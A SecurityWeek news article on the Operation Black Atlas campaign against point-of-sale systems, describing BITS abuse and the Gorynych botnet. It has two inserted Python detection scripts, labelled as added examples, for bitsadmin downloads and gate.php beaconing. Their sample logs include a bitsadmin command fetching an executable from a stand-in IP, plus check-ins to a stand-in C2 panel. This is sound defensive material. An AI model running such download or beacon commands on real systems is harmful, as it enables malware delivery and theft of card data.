SecurityWeek

Cybercrime

Operation Black Atlas Continues to Compromise PoS Systems

Operation Black Atlas, a campaign aimed at infecting point of sale (PoS) systems around the world, has managed to infect more companies and is using the modular Gorynych/Diamond Fox botnet to exfiltrate data, Trend Micro researchers warn.

Earlier this month, the security company revealed that cybercriminals were using multiple tools to compromise businesses that use card payment systems, including those in healthcare and retail, and to infect targeted systems with various PoS malware, including the BlackPOS malware.

Trend Micro said the cybercriminals behind Operation Black Atlas are using a variety of pen testing tools to discover vulnerable systems, including brute force or dictionary attack tools, SMTP (Simple Mail Transfer Protocol) scanners, and remote desktop viewers. They used a “shotgun” approach to infiltrate networks by checking available ports on the Internet on multiple targets at once, the researchers said.

The operation was focused on spreading a variety of malware, including BlackPoS, also known as Kaptoxa, while the masterminds behind it were also looking to steal user credentials to sites that contain sensitive information, email accounts, and Facebook. The operation is aimed at small and medium-sized businesses across the globe, and appears to be successfully infecting targets across a variety of industries.

Most recently, the infection spread to a multi-state healthcare provider, dental clinics, a machine manufacturer, a technology company focusing on insurance services, a gas station that has a multi-state presence, and a beauty supply shop, Trend Micro said in a new blog post on the operation.

The security company also explains that the cybercriminals behind Black Atlas introduce PoS threats into the compromised systems by abusing a legitimate Windows function, the Background Intelligent Transfer Service (BITS), through its command-line tool bitsadmin.exe. The service is used for transferring files to and from Microsoft and is mostly used for system updates, which is why its traffic can easily pass through firewalls.

As part of this operation, bad actors use BITS to download NewPOSThings, a piece of malware that includes functions such as RAM scraper, keylogger, keep-alive reporting, and data transfer routines. Moreover, they load a variant of Neutrino or Kasidet, also with PoS card-scraping functionality, as well as CenterPOS, Project Hook, and PwnPOS in some cases.
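The BITS abuse described above leaves a trace in process-creation telemetry: bitsadmin.exe is started with a transfer switch and a URL that is not one of the update sources the organization normally pulls from. The following detection logic is an added example written for this article and is not code from Trend Micro or SecurityWeek. The tab-separated log format, the hostnames in the allowlist, the timestamps and the IP address are all constructed for the illustration; the bitsadmin switches it matches (/transfer, /addfile, /create, /resume) are real ones.

```python
"""Flag bitsadmin.exe transfers from unapproved sources in process-creation logs.

Added example, not from the Trend Micro report or the SecurityWeek article.
Constructed log format: one event per line, tab-separated as
    timestamp <TAB> host <TAB> user <TAB> command line
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Real bitsadmin.exe switches that create or feed a download job.
TRANSFER_SWITCHES = {"/transfer", "/addfile", "/create", "/resume"}

# Constructed allowlist of sources the OS legitimately pulls from via BITS;
# in practice populate it from your own update infrastructure (WSUS etc.).
ALLOWED_HOSTS = {
    "download.microsoft.com",
    "windowsupdate.microsoft.com",
    "wsus.corp.example",  # hypothetical internal WSUS server
}

# Full URL with a named group for the host part.
URL_RE = re.compile(r"https?://(?P<host>[^/\s]+)\S*", re.IGNORECASE)


@dataclass
class Finding:
    timestamp: str
    host: str
    user: str
    reason: str
    url: str


def analyze_event(line: str) -> Optional[Finding]:
    """Return a Finding when bitsadmin pulls from an unapproved source, else None."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 4:
        return None
    ts, host, user, cmd = parts
    lowered = cmd.lower()
    if "bitsadmin" not in lowered:
        return None
    # Only transfer-related invocations are interesting; "/list" etc. are noise.
    switches = {tok for tok in lowered.split() if tok.startswith("/")}
    if not switches & TRANSFER_SWITCHES:
        return None
    m = URL_RE.search(cmd)
    if m is None:
        return Finding(ts, host, user, "bitsadmin transfer without a URL on the command line", "")
    if m.group("host").lower() in ALLOWED_HOSTS:
        return None
    return Finding(ts, host, user, "bitsadmin transfer from unapproved host", m.group(0))


def scan(lines: List[str]) -> List[Finding]:
    """Run analyze_event over every line and keep the hits."""
    return [f for f in (analyze_event(l) for l in lines) if f is not None]


# Constructed sample events (timestamps, hosts, users and IP are made up).
SAMPLE_LOG = [
    "\t".join(("2015-12-15T08:01:02", "POS-TERM-07", "SYSTEM",
               "C:\\Windows\\System32\\bitsadmin.exe /transfer updjob /download /priority normal "
               "http://download.microsoft.com/update.cab C:\\Temp\\update.cab")),
    "\t".join(("2015-12-15T08:03:44", "POS-TERM-07", "POS-TERM-07\\admin",
               "bitsadmin /transfer n /priority high http://198.51.100.23/svc.exe "
               "C:\\Users\\Public\\svc.exe")),
    "\t".join(("2015-12-15T08:05:10", "WS-042", "CORP\\jsmith", "notepad.exe C:\\notes.txt")),
    "\t".join(("2015-12-15T08:06:00", "WS-042", "CORP\\jsmith", "bitsadmin /list")),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.timestamp} {f.host} {f.user}: {f.reason} {f.url}")
```

Only the second event is reported: the first is a transfer from an allowlisted update host and the last two are not transfers at all. Tuning is mostly a matter of keeping the allowlist honest; a BITS job that fetches a file into a user-writable directory from an address outside it is the pattern the operation relies on.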

The cybercriminals running Black Atlas also managed to build a replica of the Gorynych / Diamond Fox botnet malware and repurposed it to specifically look for the output file of the BlackPoS malware, which includes harvested credit card data. The modular botnet also includes plugins for getting screenshots, passwords, mails, and more.


The security researchers explain that Gorynych routines focus mainly on anti-analysis, information theft, and installation, and that the plugins provide it with increased functionality. The Diamond Fox builder has the keylogger and PoS grabber functionalities disabled by default, but they have been turned on as part of Operation Black Atlas.

After infection, Gorynych downloads its plugins and reports to its server via gate.php using HTTP POST, while using its own user-agent that can be found in the configuration file. The information is encrypted using a simple XOR operation, Trend Micro explained. The security researchers also managed to extract hashes, addresses, and other indicators related to Gorynych and included them in an IOC document, and offer details on the entire Operation Black Atlas in a technical brief.
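The check-in behaviour described above (HTTP POST to a gate.php, a user-agent that no browser sends, repeated on a schedule) is something a proxy log can surface without any of the IOCs from the report. The hunt below is an added example written for this article, not code from Trend Micro or SecurityWeek. The log format, the client and server addresses, the timestamps and the "custom-agent/1.0" user-agent string are constructed; the real Gorynych user-agent is whatever is in its configuration file and is not reproduced here.

```python
"""Hunt for gate.php check-ins with a non-browser user-agent in web-proxy logs.

Added example, not from the Trend Micro report or the SecurityWeek article.
Constructed log format, one request per line:
    epoch_seconds client_ip method url status "user_agent"
"""
import re
import statistics
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

LINE_RE = re.compile(r'^(\d+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')

# Prefixes used by mainstream browser user-agents (constructed, not exhaustive).
BROWSER_UA_PREFIXES = ("Mozilla/", "Opera/")


def parse(line: str) -> Optional[dict]:
    """Turn one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    ts, ip, method, url, status, ua = m.groups()
    return {"ts": int(ts), "ip": ip, "method": method.upper(),
            "url": url, "status": int(status), "ua": ua}


def is_gate_checkin(ev: dict) -> bool:
    """POST to a path ending in gate.php from something that is not a browser."""
    path = ev["url"].split("?", 1)[0]
    return (ev["method"] == "POST"
            and path.lower().endswith("/gate.php")
            and not ev["ua"].startswith(BROWSER_UA_PREFIXES))


def beacon_stats(events: List[dict]) -> Dict[Tuple[str, str], dict]:
    """Group check-ins by (client, url) and measure how regular their timing is."""
    by_pair = defaultdict(list)
    for ev in events:
        if is_gate_checkin(ev):
            by_pair[(ev["ip"], ev["url"])].append(ev["ts"])
    out = {}
    for pair, stamps in by_pair.items():
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if len(gaps) >= 2:
            mean = statistics.mean(gaps)
            # Coefficient of variation: near 0 means a fixed sleep interval.
            jitter = statistics.pstdev(gaps) / mean if mean else 0.0
        else:
            mean, jitter = (gaps[0] if gaps else 0), None
        out[pair] = {"count": len(stamps), "mean_gap": mean, "jitter": jitter}
    return out


def hunt(lines: List[str], max_jitter: float = 0.2, min_count: int = 3) -> Dict[Tuple[str, str], dict]:
    """Return (client, url) pairs that check in at least min_count times on a steady interval."""
    events = [e for e in map(parse, lines) if e is not None]
    return {pair: s for pair, s in beacon_stats(events).items()
            if s["count"] >= min_count and s["jitter"] is not None and s["jitter"] <= max_jitter}


# Constructed sample traffic: one infected client beaconing every ~300 s,
# plus ordinary browsing and two one-off requests that should not be flagged.
GATE = "http://203.0.113.9/panel/gate.php"
SAMPLE_LOG = [
    f'1450000000 10.0.5.21 POST {GATE} 200 "custom-agent/1.0"',
    f'1450000005 10.0.5.22 GET http://www.example.com/ 200 "Mozilla/5.0 (Windows NT 6.1)"',
    f'1450000300 10.0.5.21 POST {GATE} 200 "custom-agent/1.0"',
    f'1450000310 10.0.5.23 POST {GATE} 200 "Mozilla/5.0 (Windows NT 6.1)"',
    f'1450000601 10.0.5.21 POST {GATE} 200 "custom-agent/1.0"',
    f'1450000700 10.0.5.24 POST {GATE} 200 "custom-agent/1.0"',
    f'1450000900 10.0.5.21 POST {GATE} 200 "custom-agent/1.0"',
    "this line is malformed and is skipped",
]

if __name__ == "__main__":
    for (ip, url), s in hunt(SAMPLE_LOG).items():
        print(f"{ip} -> {url}: {s['count']} check-ins, mean gap {s['mean_gap']}s, jitter {s['jitter']:.3f}")
```

Only client 10.0.5.21 is returned: it posts four times at gaps of 300, 301 and 299 seconds. The single request from 10.0.5.24 matches the path and user-agent pattern but has no cadence to measure, and the request from 10.0.5.23 comes from a browser user-agent, so neither reaches the threshold. The gate.php path is the page's own indicator; the interval check is what keeps a one-off hit on a similarly named legitimate page from paging anyone.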

The security firm notes that companies threatened by this operation should assess their security posture and apply multiple PoS strategies, with network segmentation and isolation of cardholder data environment from other networks considered a standard approach. Large organizations should eliminate unnecessary data and monitor the remaining information, while also ensuring that essential controls are running via regular security checks and that event logs are monitored as well.
